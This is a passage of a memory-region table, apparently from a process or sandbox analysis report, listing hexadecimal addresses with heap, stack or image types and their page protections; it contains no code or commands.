|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
6CD000
|
heap default
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
430000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
170000
|
heap private
|
page read and write
|
||
2F8C000
|
unkown
|
page read and write
|
||
970000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
33D000
|
heap default
|
page read and write
|
||
750000
|
unkown
|
page readonly
|
||
2CB0000
|
heap private
|
page read and write
|
||
657000
|
heap default
|
page read and write
|
||
344C000
|
unkown
|
page read and write
|
||
200000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
1C75E000
|
unkown
|
page read and write
|
||
B4F000
|
unkown
|
page read and write
|
||
850000
|
unkown
|
page readonly
|
||
1D80000
|
heap private
|
page read and write
|
||
3160000
|
unkown
|
page read and write
|
||
367000
|
heap default
|
page read and write
|
||
200000
|
unkown
|
page readonly
|
||
8B0000
|
heap private
|
page read and write
|
||
6F3000
|
unkown
|
page execute and read and write
|
||
20000
|
heap private
|
page read and write
|
||
23D7000
|
unkown
|
page readonly
|
||
2B0000
|
unkown
|
page readonly
|
||
7F0000
|
unkown
|
page readonly
|
||
2F36000
|
unkown
|
page read and write
|
||
2C55000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
120000
|
heap default
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
2610000
|
unkown
|
page readonly
|
||
1AC000
|
stack
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
B57000
|
heap private
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
AFE000
|
unkown
|
page read and write
|
||
60000
|
heap default
|
page read and write
|
||
23D7000
|
unkown
|
page readonly
|
||
281000
|
unkown
|
page execute and read and write
|
||
307000
|
heap default
|
page read and write
|
||
318F000
|
unkown
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
DB2000
|
heap private
|
page read and write
|
||
1B37D000
|
unkown
|
page read and write
|
||
31E8000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
6B4000
|
heap default
|
page read and write
|
||
1E47000
|
unkown
|
page readonly
|
||
225E000
|
stack
|
page read and write
|
||
450000
|
heap default
|
page read and write
|
||
2AC0000
|
unkown
|
page write copy
|
||
3C0000
|
heap private
|
page read and write
|
||
1C61E000
|
unkown
|
page read and write
|
||
66F000
|
heap default
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
700000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
39DD000
|
unkown
|
page read and write
|
||
577000
|
heap default
|
page read and write
|
||
697000
|
heap default
|
page read and write
|
||
71A000
|
heap default
|
page read and write
|
||
2B90000
|
heap private
|
page execute and read and write
|
||
12D21000
|
unkown
|
page read and write
|
||
677000
|
heap default
|
page read and write
|
||
4C7000
|
heap default
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
2C0000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
627000
|
heap default
|
page read and write
|
||
2F07000
|
unkown
|
page read and write
|
||
542000
|
heap default
|
page read and write
|
||
3423000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
238F000
|
stack
|
page read and write
|
||
361000
|
heap default
|
page read and write
|
||
640000
|
heap default
|
page read and write
|
||
2E90000
|
unkown
|
page read and write
|
||
273E000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
6E0000
|
heap default
|
page read and write
|
||
2A50000
|
unkown
|
page read and write
|
||
3365000
|
unkown
|
page read and write
|
||
280E000
|
unkown
|
page read and write
|
||
440000
|
heap default
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
1FDF000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
BB000
|
unkown
|
page read and write
|
||
B07000
|
unkown
|
page readonly
|
||
281E000
|
unkown
|
page read and write
|
||
2C11000
|
unkown
|
page read and write
|
||
29AE000
|
stack
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
39D000
|
heap default
|
page read and write
|
||
1B36A000
|
unkown
|
page read and write
|
||
D52000
|
heap private
|
page read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
||
C4D000
|
stack
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
201000
|
unkown
|
page execute and read and write
|
||
B50000
|
heap private
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
2756000
|
unkown
|
page read and write
|
||
C30000
|
heap private
|
page read and write
|
||
23C0000
|
heap private
|
page read and write
|
||
EB000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
27CF000
|
stack
|
page read and write
|
||
750000
|
unkown
|
page readonly
|
||
490000
|
heap default
|
page read and write
|
||
267000
|
heap default
|
page read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
26A0000
|
unkown
|
page write copy
|
||
10021000
|
unkown
|
page execute and read and write
|
||
868000
|
heap private
|
page read and write
|
||
12C000
|
unkown
|
page read and write
|
||
27CE000
|
stack
|
page read and write
|
||
324000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2C3000
|
unkown
|
page execute and read and write
|
||
720000
|
unkown
|
page readonly
|
||
CC0000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1BB70000
|
heap private
|
page read and write
|
||
35CB000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
260000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
12E60000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page write copy
|
||
280000
|
unkown
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
283000
|
unkown
|
page execute and read and write
|
||
32E000
|
unkown
|
page read and write
|
||
1C7F000
|
unkown
|
page read and write
|
||
D34000
|
heap private
|
page read and write
|
||
390000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
310000
|
heap private
|
page read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
3E0000
|
heap private
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
2B80000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page readonly
|
||
1B840000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
A57000
|
unkown
|
page readonly
|
||
7FF00170000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
D1C000
|
unkown
|
page read and write
|
||
D34000
|
heap private
|
page read and write
|
||
2F24000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
3AE8000
|
unkown
|
page read and write
|
||
3D0000
|
unkown
|
page read and write
|
||
2F75000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
2CD000
|
heap default
|
page read and write
|
||
4B4000
|
heap default
|
page read and write
|
||
28A000
|
stack
|
page read and write
|
||
5F7000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2C4D000
|
stack
|
page read and write
|
||
299D000
|
unkown
|
page read and write
|
||
25D0000
|
unkown
|
page readonly
|
||
350000
|
heap private
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
D1E000
|
unkown
|
page read and write
|
||
2AA2000
|
heap private
|
page read and write
|
||
30E000
|
heap default
|
page read and write
|
||
1CCC0000
|
heap private
|
page read and write
|
||
220000
|
unkown
|
page readonly
|
||
AC0000
|
unkown
|
page read and write
|
||
2F48000
|
unkown
|
page read and write
|
||
2E4A000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
23D7000
|
unkown
|
page readonly
|
||
690000
|
heap default
|
page read and write
|
||
9B4000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2B70000
|
unkown
|
page read and write
|
||
3146000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
B0000
|
unkown
|
page readonly
|
||
344000
|
heap default
|
page read and write
|
||
2E60000
|
unkown
|
page readonly
|
||
290000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
540000
|
heap private
|
page read and write
|
||
530000
|
heap private
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
2FDF000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
587000
|
heap default
|
page read and write
|
||
3CF000
|
stack
|
page read and write
|
||
1B3E0000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
2EFA000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
C50000
|
unkown
|
page read and write
|
||
3512000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
1C94D000
|
unkown
|
page read and write
|
||
567000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
B0D000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
99F000
|
unkown
|
page read and write
|
||
D20000
|
unkown
|
page readonly
|
||
647000
|
heap default
|
page read and write
|
||
2A4F000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
277E000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
C20000
|
heap private
|
page read and write
|
||
460000
|
unkown
|
page readonly
|
||
220000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
662000
|
heap default
|
page read and write
|
||
2340000
|
unkown
|
page readonly
|
||
3B88000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
DF0000
|
unkown
|
page readonly
|
||
741000
|
unkown
|
page execute and read and write
|
||
2F43000
|
unkown
|
page read and write
|
||
54F000
|
stack
|
page read and write
|
||
12C11000
|
unkown
|
page read and write
|
||
317000
|
heap default
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page readonly
|
||
1FE0000
|
heap private
|
page execute and read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
2E47000
|
unkown
|
page read and write
|
||
1F5D000
|
unkown
|
page read and write
|
||
2E74000
|
unkown
|
page read and write
|
||
366000
|
heap default
|
page read and write
|
||
D94000
|
heap private
|
page read and write
|
||
2E67000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
2A80000
|
heap private
|
page read and write
|
||
2FBD000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
1B3E5000
|
unkown
|
page read and write
|
||
25A000
|
stack
|
page read and write
|
||
1B323000
|
unkown
|
page read and write
|
||
3B8000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
90000
|
unkown
|
page readonly
|
||
353E000
|
unkown
|
page read and write
|
||
2E3E000
|
unkown
|
page read and write
|
||
2C7000
|
heap default
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
690000
|
heap default
|
page read and write
|
||
3541000
|
unkown
|
page read and write
|
||
35CF000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
1D85000
|
heap private
|
page read and write
|
||
98D000
|
unkown
|
page read and write
|
||
2FC0000
|
unkown
|
page read and write
|
||
87D000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2AB000
|
unkown
|
page read and write
|
||
13C000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
279D000
|
stack
|
page read and write
|
||
23D7000
|
unkown
|
page readonly
|
||
3D3000
|
unkown
|
page execute and read and write
|
||
23B0000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3525000
|
unkown
|
page read and write
|
||
30C3000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
380000
|
unkown
|
page readonly
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
70E000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
6EB000
|
heap default
|
page read and write
|
||
A0000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
392000
|
heap default
|
page read and write
|
||
26F0000
|
heap private
|
page read and write
|
||
2F8F000
|
unkown
|
page read and write
|
||
1E10000
|
heap private
|
page read and write
|
||
29C000
|
stack
|
page read and write
|
||
1BA80000
|
heap private
|
page read and write
|
||
1ED0000
|
heap private
|
page read and write
|
||
1B780000
|
unkown
|
page write copy
|
||
384000
|
heap default
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
8C0000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
22DE000
|
unkown
|
page read and write
|
||
2FFF000
|
unkown
|
page read and write
|
||
530000
|
heap default
|
page read and write
|
||
620000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1C60000
|
unkown
|
page readonly
|
||
7FF00105000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
907000
|
unkown
|
page readonly
|
||
50E000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
B37000
|
unkown
|
page readonly
|
||
2D20000
|
heap private
|
page read and write
|
||
2A4E000
|
unkown
|
page read and write | page guard
|
||
2EAD000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2EB8000
|
unkown
|
page read and write
|
||
13C000
|
stack
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2B4000
|
heap default
|
page read and write
|
||
13C000
|
stack
|
page read and write
|
||
1C6000
|
unkown
|
page read and write
|
||
67000
|
heap default
|
page read and write
|
||
537000
|
heap default
|
page read and write
|
||
2C1E000
|
stack
|
page read and write
|
||
710000
|
unkown
|
page readonly
|
||
640000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
850000
|
unkown
|
page read and write
|
||
1F0000
|
heap private
|
page read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
544000
|
heap private
|
page read and write
|
||
2F03000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2E61000
|
unkown
|
page read and write
|
||
1B3EA000
|
unkown
|
page read and write
|
||
23D000
|
unkown
|
page read and write
|
||
5A7000
|
heap default
|
page read and write
|
||
3515000
|
unkown
|
page read and write
|
||
16A000
|
stack
|
page read and write
|
||
21F0000
|
unkown
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
570000
|
heap default
|
page read and write
|
||
1B3F0000
|
unkown
|
page readonly
|
||
580000
|
unkown
|
page readonly
|
||
110000
|
unkown
|
page readonly
|
||
D52000
|
heap private
|
page read and write
|
||
2B8A000
|
unkown
|
page read and write
|
||
4CD000
|
heap default
|
page read and write
|
||
627000
|
heap default
|
page read and write
|
||
5E0000
|
unkown
|
page readonly
|
||
285E000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
334000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2F71000
|
unkown
|
page read and write
|
||
950000
|
unkown
|
page readonly
|
||
920000
|
unkown
|
page readonly
|
||
2C74000
|
unkown
|
page read and write
|
||
20D000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
3C0000
|
heap default
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
223000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
312D000
|
unkown
|
page read and write
|
||
9BE000
|
unkown
|
page read and write
|
||
557000
|
heap default
|
page read and write
|
||
35D2000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
3BC000
|
heap default
|
page read and write
|
||
CEE000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2E96000
|
unkown
|
page read and write
|
||
2870000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
860000
|
heap private
|
page read and write
|
||
26D0000
|
unkown
|
page readonly
|
||
554000
|
heap default
|
page read and write
|
||
397000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
9E000
|
heap default
|
page read and write
|
||
65D000
|
heap default
|
page read and write
|
||
275E000
|
unkown
|
page read and write
|
||
CE0000
|
heap private
|
page read and write
|
||
590000
|
unkown
|
page readonly
|
||
C0000
|
unkown
|
page execute and read and write
|
||
290F000
|
unkown
|
page read and write
|
||
23C0000
|
unkown
|
page read and write
|
||
62D000
|
heap default
|
page read and write
|
||
25A0000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2C8D000
|
stack
|
page read and write
|
||
D90000
|
heap private
|
page read and write
|
||
880000
|
unkown
|
page readonly
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
229E000
|
unkown
|
page read and write
|
||
243000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page read and write
|
||
460000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
2820000
|
unkown
|
page readonly
|
||
2CC000
|
stack
|
page read and write
|
||
702000
|
heap default
|
page read and write
|
||
270000
|
unkown
|
page readonly
|
||
1C5000
|
unkown
|
page read and write | page guard
|
||
2860000
|
unkown
|
page readonly
|
||
406000
|
unkown
|
page read and write
|
||
1EB0000
|
unkown
|
page readonly
|
||
2FA0000
|
unkown
|
page read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
90000
|
unkown
|
page read and write
|
||
2D8000
|
heap private
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
1ED7000
|
heap private
|
page read and write
|
||
574000
|
heap default
|
page read and write
|
||
339000
|
heap default
|
page read and write
|
||
530000
|
unkown
|
page readonly
|
||
2F0C000
|
unkown
|
page read and write
|
||
2C46000
|
unkown
|
page read and write
|
||
2F20000
|
unkown
|
page read and write
|
||
D30000
|
heap private
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
100000
|
heap default
|
page read and write
|
||
3554000
|
unkown
|
page read and write
|
||
120000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
314000
|
heap default
|
page read and write
|
||
1B8A0000
|
unkown
|
page read and write
|
||
206000
|
unkown
|
page read and write
|
||
737000
|
heap default
|
page read and write
|
||
594000
|
heap default
|
page read and write
|
||
2FC3000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
A67000
|
unkown
|
page readonly
|
||
2A0000
|
unkown
|
page readonly
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
2B9A000
|
heap private
|
page execute and read and write
|
||
34D000
|
heap default
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
335B000
|
unkown
|
page read and write
|
||
2810000
|
unkown
|
page readonly
|
||
230000
|
heap private
|
page read and write
|
||
1E14000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1B2E0000
|
unkown
|
page read and write
|
||
1CC000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
90000
|
unkown
|
page read and write
|
||
67D000
|
heap default
|
page read and write
|
||
513000
|
heap default
|
page read and write
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
12C3C000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
6C0000
|
unkown
|
page readonly
|
||
614000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
B50000
|
heap private
|
page read and write
|
||
A20000
|
unkown
|
page readonly
|
||
BC0000
|
heap private
|
page read and write
|
||
344000
|
heap private
|
page read and write
|
||
1E3000
|
unkown
|
page execute and read and write
|
||
860000
|
heap private
|
page read and write
|
||
2B0000
|
unkown
|
page execute and read and write
|
||
630000
|
unkown
|
page readonly
|
||
2F92000
|
unkown
|
page read and write
|
||
1B2EB000
|
unkown
|
page read and write
|
||
56D000
|
heap default
|
page read and write
|
||
1B0000
|
heap private
|
page read and write
|
||
5A0000
|
heap default
|
page read and write
|
||
3DC000
|
unkown
|
page read and write
|
||
FB000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
2D0000
|
heap default
|
page read and write
|
||
A20000
|
heap private
|
page read and write
|
||
1C82E000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page readonly
|
||
12D81000
|
unkown
|
page read and write
|
||
410000
|
heap private
|
page read and write
|
||
26BE000
|
stack
|
page read and write
|
||
7FF00280000
|
unkown
|
page read and write
|
||
3633000
|
unkown
|
page read and write
|
||
1CAB0000
|
heap private
|
page read and write
|
||
2E40000
|
unkown
|
page read and write
|
||
337000
|
heap default
|
page read and write
|
||
2FA4000
|
unkown
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
497000
|
heap default
|
page read and write
|
||
1B389000
|
unkown
|
page read and write
|
||
664000
|
heap default
|
page read and write
|
||
92F000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
2E50000
|
heap private
|
page read and write
|
||
1E3000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page read and write
|
||
24B000
|
unkown
|
page read and write
|
||
2E86000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
2D5E000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
2330000
|
unkown
|
page readonly
|
||
10023000
|
unkown
|
page execute and read and write
|
||
58D000
|
heap default
|
page read and write
|
||
25D0000
|
unkown
|
page readonly
|
||
290000
|
heap default
|
page read and write
|
||
5AD000
|
heap default
|
page read and write
|
||
31CD000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
C40000
|
unkown
|
page read and write
|
||
3D1000
|
unkown
|
page execute and read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
DC8000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2BC000
|
stack
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
960000
|
heap private
|
page read and write
|
||
27A0000
|
unkown
|
page write copy
|
||
2F95000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2B8E000
|
unkown
|
page read and write
|
||
3B7C000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
1E80000
|
unkown
|
page read and write
|
||
374000
|
heap default
|
page read and write
|
||
2F10000
|
unkown
|
page read and write
|
||
23D0000
|
unkown
|
page readonly
|
||
743000
|
unkown
|
page execute and read and write
|
||
26F4000
|
heap private
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
12EC2000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
644000
|
heap default
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
F0000
|
unkown
|
page readonly
|
||
3522000
|
unkown
|
page read and write
|
||
346000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2EA9000
|
unkown
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
2A5E000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
3551000
|
unkown
|
page read and write
|
||
353B000
|
unkown
|
page read and write
|
||
25D0000
|
unkown
|
page readonly
|
||
347000
|
heap default
|
page read and write
|
||
65C000
|
heap default
|
page read and write
|
||
2C50000
|
heap private
|
page read and write
|
||
1AC70000
|
unkown
|
page read and write
|
||
2EEE000
|
unkown
|
page read and write
|
||
2B1E000
|
unkown
|
page read and write
|
||
3528000
|
unkown
|
page read and write
|
||
2F3D000
|
unkown
|
page read and write
|
||
3564000
|
unkown
|
page read and write
|
||
29FC000
|
unkown
|
page read and write
|
||
35E000
|
stack
|
page read and write
|
||
650000
|
unkown
|
page readonly
|
||
2F6A000
|
unkown
|
page read and write
|
||
534000
|
heap private
|
page read and write
|
||
69C000
|
heap default
|
page read and write
|
||
760000
|
heap private
|
page read and write
|
||
3557000
|
unkown
|
page read and write
|
||
3E0000
|
heap default
|
page read and write
|
||
21C000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3B04000
|
unkown
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
3159000
|
unkown
|
page read and write
|
||
6F1000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
6F9000
|
heap default
|
page read and write
|
||
25F0000
|
unkown
|
page read and write
|
||
580000
|
heap default
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
1D70000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
12C15000
|
unkown
|
page read and write
|
||
2BD0000
|
heap private
|
page execute and read and write
|
||
7FF00040000
|
unkown
|
page read and write
|
||
1B400000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
1FC000
|
unkown
|
page read and write
|
||
1ED4000
|
heap private
|
page read and write
|
||
23D7000
|
unkown
|
page readonly
|
||
290000
|
heap default
|
page read and write
|
||
3538000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
CAE000
|
stack
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
2AC0000
|
unkown
|
page readonly
|
||
23C0000
|
unkown
|
page readonly
|
||
36D000
|
heap default
|
page read and write
|
||
A10000
|
unkown
|
page readonly
|
||
330000
|
unkown
|
page readonly
|
||
590000
|
unkown
|
page readonly
|
||
D70000
|
heap private
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
395000
|
heap default
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
5CC000
|
heap default
|
page read and write
|
||
352B000
|
unkown
|
page read and write
|
||
FB000
|
unkown
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
2712000
|
heap private
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
BEE000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
2880000
|
unkown
|
page readonly
|
||
2E93000
|
unkown
|
page read and write
|
||
2CCE000
|
unkown
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
2FC6000
|
unkown
|
page read and write
|
||
2330000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
970000
|
unkown
|
page read and write
|
||
2D0C000
|
unkown
|
page read and write
|
||
350C000
|
unkown
|
page read and write
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
A9E000
|
unkown
|
page read and write
|
||
1E3000
|
unkown
|
page execute and read and write
|
||
A97000
|
unkown
|
page readonly
|
||
2C10000
|
unkown
|
page readonly
|
||
1B362000
|
unkown
|
page read and write
|
||
3497000
|
unkown
|
page read and write
|
||
930000
|
heap private
|
page read and write
|
||
51F000
|
heap default
|
page read and write
|
||
550000
|
heap default
|
page read and write
|
||
3B84000
|
unkown
|
page read and write
|
||
8C0000
|
unkown
|
page readonly
|
||
2DCE000
|
stack
|
page read and write
|
||
1DBB000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1C69E000
|
unkown
|
page read and write
|
||
226E000
|
unkown
|
page read and write
|
||
D8E000
|
unkown
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
460000
|
unkown
|
page readonly
|
||
458000
|
heap private
|
page read and write
|
||
C9E000
|
unkown
|
page read and write
|
||
300000
|
heap default
|
page read and write
|
||
7B0000
|
unkown
|
page readonly
|
||
7FF00200000
|
unkown
|
page read and write
|
||
2320000
|
unkown
|
page readonly
|
||
21F0000
|
unkown
|
page readonly
|
||
354E000
|
unkown
|
page read and write
|
||
350F000
|
unkown
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
39F000
|
heap default
|
page read and write
|
||
2F5D000
|
unkown
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
360000
|
unkown
|
page read and write
|
||
6C7000
|
heap default
|
page read and write
|
||
D30000
|
heap private
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
4E0000
|
heap default
|
